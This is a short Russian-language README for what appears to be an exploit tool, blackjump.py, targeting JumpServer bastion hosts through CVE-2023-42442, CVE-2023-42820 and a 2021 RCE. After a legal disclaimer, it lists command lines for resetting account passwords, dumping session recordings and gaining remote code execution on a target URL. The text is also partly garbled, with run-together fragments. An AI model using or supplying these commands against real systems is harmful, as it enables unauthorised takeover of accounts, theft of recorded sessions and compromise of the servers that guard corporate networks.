
JumpServer комплексный эксплойт для неавторизованного доступа к шлюзу, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021
Отказ от ответственности: Данный инструмент предназначен только для законных действий по обеспечению безопасности корпоративных систем. При использовании данного инструмента для тестирования вы должны убедиться, что такие действия соответствуют местным законам и нормативным актам, а также что у вас есть достаточные разрешения. Не используйте его на неавторизованных целях.
Если в процессе использования данного инструмента вы совершаете какие-либо незаконные действия, вы несете полную ответственность за последствия; мы не несем никакой юридической или иной ответственности.
Скомпрометированный эксплуатация JumpServer Bastion Host
python3 -m pip install -r requirements.txt
--user и --emailpython3 blackjump.py reset https://vulerability

<uuid4>.tar в каталоге output/ можно вставить в плеер JumpServer для воспроизведенияpython3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h